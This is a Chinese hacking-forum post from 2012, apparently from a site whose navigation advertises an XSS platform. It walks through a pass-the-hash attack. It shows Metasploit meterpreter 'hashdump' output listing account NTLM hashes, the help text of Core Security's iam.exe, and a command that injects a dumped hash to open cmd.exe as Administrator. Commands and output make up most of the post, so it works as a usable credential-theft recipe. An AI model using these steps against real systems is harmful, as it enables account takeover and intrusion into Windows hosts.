切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
154 HASH攻击 Pass-The-Hash Toolkit[复制链接]
发表于 2012-9-19 01:48:59 | 显示全部楼层 |!read_mode!

下载地址: http://oss.coresecurity.com/psht ... pshtoolkit_v1.4.tgz

先用METASPLOIT获得HASH

  1. meterpreter > hashdump
  2. Administrator:500:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  3. brk:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
  4. Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
  5. HelpAssistant:1000:198637c481956d26764ca5b909854cfc:fd119afad3d4fd346550b862a9171f09:::
  6. SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:842e5689e6a7ea73811a50b4b5b88933:::
  7. meterpreter >
复制代码
再用IAM.EXE注入:

  1. C:\pshtoolkit\iam>iam.exe -h
  2. IAM v1.4 - by Hernan Ochoa (hochoa@coresecurity.com, hernan@gmail.com) - (c) 200
  3. 7-2008 Core Security Technologies
  4. iam.exe: option requires an argument -- h
  5. This tool changes the current session NTLM credentials.
  6. options:
  7.         -h              username:domainname:LMhash:NThash
  8.         -B              optional parameter. If iam.exe crashes or doesn't work w
  9. hen run in your system, use this parameter. IAM.EXE will try to locate some memo
  10. ry locations instead of using hard-coded values.
  11.         -H              this help.
  12.         -D              enable debug info.
  13.         -a              specify addresses to use. Format: ADDCREDENTIAL_ADDR:ENC
  14. RYPTMEMORY_ADDR:FEEDBACK_ADDR:DESKEY_ADDR:LOGONSESSIONLIST_ADDR:LOGONSESSIONLIST
  15. _COUNT_ADDR (WARNING!: if you use the wrong values the system may crash)
  16.         -r              <cmd>. Create a new logon session and run a command with
  17. the specified credentials (e.g.: -r cmd.exe)


  18. Examples:
  19.                 iam.exe -h administrator:mydomain:0102030405060708090A0B0C0D0E0F
  20. 10:0102030405060708090A0B0C0D0E0F10

  21. or:

  22.                 iam.exe -b -h administrator:mydomain:0102030405060708090A0B0C0D0
  23. E0F10:0102030405060708090A0B0C0D0E0F10

  24. C:\pshtoolkit\iam>
复制代码
用法:
iam.exe -h 用户:域:hash
例如:

  1. C:\pshtoolkit\iam>iam.exe -b -h administrator:dis9:44efce164ab921caaad3b435b5140
  2. 4ee:32ed87bdb5fdc5e9cba88547376818d4 -r cmd.exe
复制代码
这个工具非常不好用 成功不大 你知道他就行



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-9-25 08:29

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部